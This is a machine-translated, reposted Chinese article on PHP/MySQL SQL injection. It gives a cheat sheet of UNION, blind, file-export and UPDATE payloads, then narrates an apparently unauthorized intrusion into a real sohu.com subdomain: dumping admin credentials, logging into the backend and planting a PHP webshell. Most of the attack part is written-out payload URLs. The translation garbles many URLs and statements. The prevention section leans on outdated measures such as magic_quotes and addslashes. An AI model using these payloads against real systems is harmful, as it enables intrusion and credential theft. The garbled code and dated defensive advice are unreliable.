Analysis of php SQL injection process

Source: Internet
Author: User
Tags basic sql injection mysql injection
Today, I learned some basic SQL injection skills from the Internet. The focus of SQL injection is to construct SQL statements. Only SQL statements can be used flexibly to construct NIUBI injection strings. today, I learned some basic SQL injection skills from the Internet. The focus of SQL injection is to construct SQL statements. Only SQL statements can be used flexibly.
Statement can be used to construct the cou injection string. After completing the course, I wrote some notes and made them ready for use at any time. I hope you have read the following content first.
The basic principle of SQL. The code in the note comes from the network.
  === Basic part ===
This table query:
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LENGTH (password) = '6
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LEFT (password, 1) ='m
Union statement:
Http: // 127.0.0.1/injection/show. php? Id = 1 'Union select 1, username, password from user /*
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user /*
Export file:
Http: // 127.0.0.1/injection/user. php? Username = angel 'into outfile' c:/file.txt
Http: // 127.0.0.1/injection/user. php? Username = 'or 1 = 1 into outfile 'C:/file.txt
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user into outfile 'C:/user.txt
   INSERT statement:
Insert into 'user' (userid, username, password, homepage, userlevel) VALUES ('', '$ username',' $ password', '$ homepage ', '1 ');
Construct homepage value: http://4ngel.net ', '3 ')#
The SQL statement changes to: INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http: // 4ngel.net ', '3') #', '1 ');
   UPDATE statement: I like this.
First understand this SQL statement
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id =' $ ID'
If the SQL statement is modified to the following format, the injection is implemented.
1: Change the homepage value
Http://4ngel.net ', userlevel = '3
Then the SQL statement becomes
UPDATE user SET password = 'mypass', homepage = 'http: // 4ngel.net ', userlevel = '3' WHERE id =' $ ID'
Userlevel: user level
2: change the password value
Mypass) 'Where username = 'admin '#
Then the SQL statement becomes
UPDATE user SET password = 'md5 (mypass) 'WHERE username = 'admin' #)', homepage = '$ homepage' WHERE id = '$ ID'
3: Change the id value
'OR username = 'admin'
Then the SQL statement becomes
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id = ''OR username = 'admin'
  === Advanced section ===
Common MySQL built-in functions
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
Database ()
Version ()
SUBSTRING ()
MID ()
Char ()
Load_file ()
......
Function applications
UPDATE article SET title = DATABASE () WHERE id = 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, database (), version ()
SELECT * FROM user WHERE username = char (97,110,103,101,108)
# Char (97,110,103,101,108) is equivalent to angel, decimal
Http: // 127.0.0.1/injection/user. php? Userid = 1 and password = char (109,121,112, 97,115,115) http: // 127.0.0.1/injection/user. php? Userid = 1 and LEFT (password, 1)> char (100)
Http: // 127.0.0.1/injection/user. php? Userid = 1 and ord (mid (password, 111)>
Determine the number and type of fields in the data structure
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select char (97), char (97), char (97)
Guess data table name
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1 from members
Obtain the user name and password from a cross-table query.
Http: // 127.0.0.1/ymdown/show. php? Id = 10000 union select 1, username, 1, password, 1 from ymdown_user where id = 1
Others
# Verify the first password
Http: // 127.0.0.1/ymdown/show. php? Id = 10 union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49
=== Injection prevention ===
Server
Set magic_quotes_gpc to On
Display_errors is set to Off
Encoding
$ Keywords = addslashes ($ keywords );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
Value type
Use intval () to capture and replace
String type
Single quotation marks must be added to SQL statement parameters.
The following code is used to prevent injection.
If (get_magic_quotes_gpc ()){
//....
} Else {
$ Str = mysql_real_escape_string ($ str );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
}
Useful functions
Stripslashes ()
Get_magic_quotes_gpc ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
References:
Http://www.4ngel.net/article/36.htm (SQL Injection with MySQL) Chinese
Http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)
A security check on sohu.com
Published on the black line of defense
Released in http://www.loveshell.net
Sohu.com is a large portal website in China that provides many services, including email. It is very difficult for such a large website to avoid any problems. as the saying goes, the more services, the less secure it is! This is true for both servers and websites. I recently learned about Mysql injection, so by the way, I conducted a small security check on sohu.com to check whether the SQL injection vulnerability exists.
The main site of sohu.com found that it was almost static and gave up the idea of finding a problem on the main site. After browsing around the sub-stations in sohu.com, we found that most websites use Php scripts and a few use jsp scripts. Based on our experience, we know that, for Php systems, the general background database is Mysql, just as asp corresponds to Mssql. it seems that there may be many problems. Due to the features of Php (Php converts the 'and other characters in the passed parameters by default, it is difficult to inject character type variables by default ), generally, we inject only numeric variables. According to the injection knowledge at ordinary times, we know that the parameters passed in the form of id = XXX are generally numeric variables, so we only need to test the php? The connection id = XXX may find the vulnerability! Through a careful search, I really found a problematic connection http://XXX.it.sohu.com/book/serialize.php on XXX.it.sohu.com? Id = 86
Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 1 /*
Returns normal 1.
Then submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 /*
No information 2 is returned. it is empty. the SQL statement result is empty.
Through these two URLs, we can guess that the vulnerability exists, because the and 1 = 1 and 1 = 2 submitted are executed as SQL statements! The other statements we submit can also be executed. this is SQL injection! We can also know that the id variable is processed as a number and is not placed between '', otherwise we will not be able to succeed! If the variables do not filter other SQL keywords, we are very likely to succeed! I have encountered many situations where the select statement is filtered by variables, and mysql is just a dead end. it's so depressing!
Since the vulnerability exists, let's continue! First of all, it is to test the database type and the account used to connect to the database! If you have high permissions and the database and the web are on the same machine, you can avoid the headache of guessing fields! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and ord (mid (version (), 1, 1)> 51 /*
3 is returned normally. this statement checks whether the database version is higher than 3, because the ASCII value of 3 is 51! The first character of the version is greater than 51, of course, it is more than 4.0! In 4.0, union queries are supported. This saves the headache of one guess! The result here is true, so the database is more than 4.0. union is supported.
Since union query is supported, the field of this statement is exposed first! It will be very fast to query anything using union later! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 order by 10 /*
The returned result is 4. it seems that there are more than 10 fields. submit again:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 order by 20 /*
Normal return, submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 order by 30 /*
......
No information is returned when order by 50 is reached! It seems that the value is greater than 40 and less than 50, so submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 order by 45 /*
......
Finally, I guess the field is around 41! Here we can say that some fields cannot be sorted, so we also need to use union to precisely locate the number of the field is 41, and submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select,, 32, 41 /*
Return result 5. haha, success! What fields will be displayed on the page is clear! Now let's continue! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, user (), 3, 4, database (), 6, 7, 8, 9, 10, version (), 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41 /*
Return result 6. the database system has been tested! We may not be root, and the database server and web may not be on one server, so we do not have the file permission! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and (select count (*) from mysql. user)> 0 /*
Result 7 is returned. you do not have the permission to read mysql. make sure that the permission is not root! Haha!
Since it is not root, don't be discouraged. let's continue! We 'd better find the background before proceeding to further guess the data. in many cases, we find the administrator password but cannot find a place to log in. I am very depressed to say that! Add/admin and/manage/under the root directory. common backend addresses return error 404, I guessed several times that the 403 Forbiden error was reported when I finally got admin under the/book/Directory. haha, this directory exists! However, the login page cannot be guessed, and it is depressing! However, if you know that there is an admin, you can search in Google:
Admin site: sohu.com
8. after obtaining another sub-station forum, we know that people are very lazy. Generally, the background features of a place are likely to be the characteristics of the entire website, so when I try to access/book/admin/admuser. A miracle occurred in php. 9. haha. it's closer to success! Here we know the background of the website. In fact, we can also get very important information. the name of the login form displayed in the original file is name and password, it is easy to deduce the structure of the administrator table of the other party, even if it does not conform to the estimation, it is similar, haha! So we know why we have to guess the background first! Continue to inject! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, user (), 3, 4, database (), 6, 7, 8, 9, 10, version (), 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41 from admin /*
An error is returned, indicating that the admin table does not exist. try admins, admin_user, and so on. finally, submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, user (), 3, 4, database (), 6, 7, 8, 9, 10, version (), 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41 from user /*
Return success, haha! There is a table named "User! Is it an administrator table? What is a field? Continue submission:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, name, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21,22, 23,24, 25, 26, 27,28, 29,30, 31,32, 33,34, 35,36, 37,38, 39,40, 41 from user /*
An error occurred while returning null information. submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, password, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21,22, 23,24, 25, 26, 27,28, 29,30, 31,32, 33,34, 35,36, 37,38, 39,40, 41 from user /*
Return result 10. haha, a password is returned normally. it should be the password of the first user in the administrator table! So what is his username? I guess a lot of fields are returned with errors. if there is no way to enter an ID, it returns success! ID is the name of the administrator! Submit:
Http://XXX.it.sohu.com/book/serialize.php? Id = 86 and 1 = 2 union select 1, password, 3, 4, id, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41 from user /*
Return result 11. haha, get the administrator name! Excited to log on to the background with the administrator name and password! 12. Now it's time to think about how to use webshell. I found a place to upload images in the background. but when I upload a php file, I am prompted that it is not an image file, so I am depressed! When I rummaged through the background, I found a function to generate a php file. so I inserted a php webshell with a sentence in it. after, the system prompts that it was successful, it seems that if the filter is not found, we should have got webshell. the password is a, and the backdoor is connected to 14 in one sentence. haha, it's successful! Script detection has been completed successfully!
After obtaining the webshell, I looked at it on the server and found that the server's security was good and could not execute the command. basically, all the directories except the directories we just uploaded are not writable, however, for script testing, webshell is successful! We can also see that a small parameter is not filtered, which can lead to the fall of the website, especially for large websites such as sohu.com. there are more parameters, so pay more attention to the filtering problem!
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.